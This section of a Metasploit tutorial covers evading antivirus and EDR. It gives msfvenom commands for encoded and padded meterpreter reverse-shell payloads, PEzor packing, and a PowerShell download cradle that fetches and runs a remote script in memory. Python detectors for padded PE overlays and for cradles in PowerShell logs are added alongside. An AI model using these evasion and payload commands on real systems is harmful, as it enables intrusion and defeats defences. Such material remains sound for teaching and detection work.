15. Metasploit Bypassing Antivirus and EDR Systems

Antivirus (AV) and Endpoint Detection and Response (EDR) systems monitor processes, memory, and behaviors. These techniques minimize detection.

A. Code Obfuscation

Shikata Ga Nai Encoder:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exe
  • -i 5: runs the encoder five times, wrapping the payload in five decoder layers. The decoder stub itself is well signatured, so iterations alone rarely defeat current AV; the encoder mainly changes the raw payload bytes so static signatures on them no longer match.

B. Binary Padding

Append non-functional data to the binary so that its size and hash no longer match a known signature:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o padded_payload.exe
dd if=/dev/urandom bs=1024 count=100 >> padded_payload.exe
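A defender's check for the padding step above, added here as an example that is not part of the original page or of Metasploit: it parses the PE section table, measures the overlay (bytes past the last section, which is exactly where the dd line appends data), and reports the overlay's entropy. build_minimal_pe constructs a throwaway PE32 skeleton so the check runs offline; the 4096-byte and 7.0-bit thresholds are assumptions to tune per environment.

```python
import math
import os
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    entropy = 0.0
    for c in counts:
        if c:
            p = c / n
            entropy -= p * math.log2(p)
    return entropy


def pe_overlay(data: bytes) -> bytes:
    """Return the bytes beyond the last section's raw data (the PE 'overlay').

    Random data appended with dd lands here: the loader ignores it, so the
    file still runs, but the file hash changes. Raises ValueError for input
    that is not a PE image.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]      # COFF NumberOfSections
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]  # COFF SizeOfOptionalHeader
    section_table = coff + 20 + size_of_optional
    end_of_sections = section_table + 40 * num_sections  # never shorter than the headers
    for i in range(num_sections):
        entry = section_table + 40 * i
        size_of_raw, ptr_to_raw = struct.unpack_from("<II", data, entry + 16)
        end_of_sections = max(end_of_sections, ptr_to_raw + size_of_raw)
    return data[end_of_sections:]


def padding_report(data: bytes, min_overlay: int = 4096, high_entropy: float = 7.0) -> dict:
    """Flag a large, high-entropy overlay. Thresholds are assumptions, not vendor values."""
    overlay = pe_overlay(data)
    entropy = shannon_entropy(overlay)
    return {
        "overlay_bytes": len(overlay),
        "overlay_entropy": round(entropy, 2),
        "suspicious": len(overlay) >= min_overlay and entropy >= high_entropy,
    }


def build_minimal_pe(section_bytes: bytes) -> bytes:
    """Constructed fixture: a syntactically valid PE32 skeleton with one section.

    It is not executable and contains no real code; it only exercises the parser.
    """
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0  # size of a PE32 optional header
    # Machine=i386, 1 section, timestamp/symbols zeroed, optional header size, characteristics
    coff_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    optional_header = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zeroed
    raw_ptr = 0x200
    section_header = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(section_bytes), 0x1000, len(section_bytes), raw_ptr,
        0, 0, 0, 0, 0x60000020)
    image = dos_header + b"PE\0\0" + coff_header + optional_header + section_header
    return image + b"\0" * (raw_ptr - len(image)) + section_bytes


if __name__ == "__main__":
    clean = build_minimal_pe(b"\xcc" * 64)       # constructed stand-in for a compiled binary
    padded = clean + os.urandom(100 * 1024)       # same effect as the dd line above
    print("clean :", padding_report(clean))
    print("padded:", padding_report(padded))
```

Legitimate files carry overlays too: Authenticode signatures and installer archives (NSIS, self-extractors) live there, so in production check the security data directory and the overlay's magic bytes before raising an alert on size and entropy alone.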

C. Using PEzor

PEzor is an open-source packer that encrypts and obfuscates the binary.

  1. Install PEzor:

    git clone https://github.com/phra/PEzor.git
    cd PEzor
    ./PEzor.sh -h
    
  2. Run PEzor:

    ./PEzor.sh payload.exe

D. In-Memory Execution

Avoid writing to disk by loading payloads directly into memory. Use a PowerShell download cradle:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.ps1')
  • Replace the URL with the address of the PowerShell script you host. Nothing is written to disk, but the command line and, where Script Block Logging is enabled, the fetched script content are still recorded in PowerShell's event logs.
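Detection logic for the cradle above, added here as an example that is not part of the original page: it scans PowerShell Script Block Logging records (Event ID 4104) for a script block that both fetches content over the network and evaluates it in memory. The regular expressions and the constructed sample records are assumptions; they are not a vendor rule set.

```python
import re

# Two signals drawn from the cradle on the page: an in-memory evaluator and a
# network fetch in the same script block. Either alone is common in admin
# scripts; the combination is what makes a download cradle.
EVALUATOR = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
FETCHER = re.compile(
    r"net\.webclient|downloadstring|downloaddata|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b",
    re.IGNORECASE,
)


def is_download_cradle(script_text: str) -> bool:
    """True when a script block both fetches content over the network and evaluates it."""
    return bool(EVALUATOR.search(script_text) and FETCHER.search(script_text))


def scan_script_block_events(events):
    """Return the Event ID 4104 records whose ScriptBlockText looks like a download cradle."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:   # only Script Block Logging records carry the block text
            continue
        text = ev.get("ScriptBlockText", "")
        if is_download_cradle(text):
            hits.append({"ScriptBlockId": ev.get("ScriptBlockId"),
                         "host": ev.get("Computer"), "text": text})
    return hits


# Constructed sample records in the shape of Microsoft-Windows-PowerShell/Operational 4104 events.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockId": "a1",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.ps1')"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockId": "a2",
     "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    # fetch to disk without evaluation: a FETCHER match only, so not a cradle
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockId": "a3",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://example.com/report.csv -OutFile C:\\temp\\report.csv"},
    # alias and case variant of the same cradle
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockId": "a4",
     "ScriptBlockText": "iex(iwr -UseBasicParsing 'http://192.168.1.10/x.ps1').Content"},
]


if __name__ == "__main__":
    for hit in scan_script_block_events(SAMPLE_EVENTS):
        print(f"{hit['host']} block {hit['ScriptBlockId']}: {hit['text']}")
```

Event ID 4104 only exists when Script Block Logging is turned on (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging). Because PowerShell logs script blocks as they are compiled, a cradle that is built from concatenated or encoded strings still appears in a later 4104 record in readable form, so scanning every block rather than only the outer command line is what makes this check worthwhile.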